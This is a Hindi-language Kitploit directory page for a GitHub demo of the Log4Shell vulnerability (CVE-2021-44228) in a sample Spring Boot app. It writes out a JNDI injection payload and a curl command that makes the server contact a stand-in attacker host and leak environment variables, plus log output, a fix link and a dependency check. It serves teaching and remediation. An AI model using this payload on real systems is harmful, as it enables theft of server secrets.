Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4j-vulnerability — Log4Shell (CVE-2021-44228) Log4j में एक ज़ीरो-डे भेद्यता है। | Kitploit
उपकरण/GitHubGitHub/mazhar-hassan/log4j-vulnerability
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmazhar-hassan/log4j-vulnerability

log4j-vulnerability

Log4Shell (CVE-2021-44228) Log4j में एक ज़ीरो-डे भेद्यता है।

रिपॉजिटरी देखें
3 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Log4Shell (CVE-2021-44228) Log4j में एक ज़ीरो-डे भेद्यता है

Log4J भेद्यता

खोज: 24 नवंबर 2021

पैच किया गया: 6 दिसंबर 2021

हमले का डेमो

यूट्यूब वीडियो के लिए नीचे क्लिक करें

हमले का डेमो

नमूना एप्लिकेशन

यह नमूना एप्लिकेशन एक स्प्रिंग बूट एप्लिकेशन है, जो लॉगिंग फ्रेमवर्क के रूप में log4j का उपयोग करता है, और localhost पर पोर्ट 8080 पर निम्नलिखित पर्यावरण चरों के साथ चलता है

वीडियो स्पष्टीकरण देखें:

https://youtu.be/bb6pgWrm7tA

पर्यावरण चर

key=jason.bourne;secret=Treadstone

हमला

POST http://localhost:8080//v1/public/log-test

पैरामीटर:

value=${jndi:ldap://some-random-hacking-site.com}

क्लाइंट से हमला

पर्यावरण चर प्राप्त करें

निम्नलिखित स्ट्रिंग का उपयोग करके आप पर्यावरण चर प्राप्त कर सकते हैं value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}

Curl कमांड

curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' -i http://localhost:8080/v1/public/log-test --data 'value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}'

लॉग कंसोल

2021-12-25 10:47:58,112 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://some-random-hacking-site.com]. javax.naming.CommunicationException: some-random-hacking-site:389 [Root exception is java.net.ConnectException: Connection timed out: connect] at com.sun.jndi.ldap.Connection.<init>(Connection.java:243) at com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137) at com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1615)

समाधान

https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot

पुष्टि

mvn dependency:tree सुनिश्चित करें कि कोई भी निर्भर jar फ़ाइलें भेद्य log4j संस्करण की ओर इशारा न करें।

Techflix YouTube सुरक्षा प्लेलिस्ट

https://www.youtube.com/watch?v=bb6pgWrm7tA&list=PLLqjNYIgOqeQl6NaeIeUhvNcWdpOVNkRi&index=1

टूल डाउनलोड करें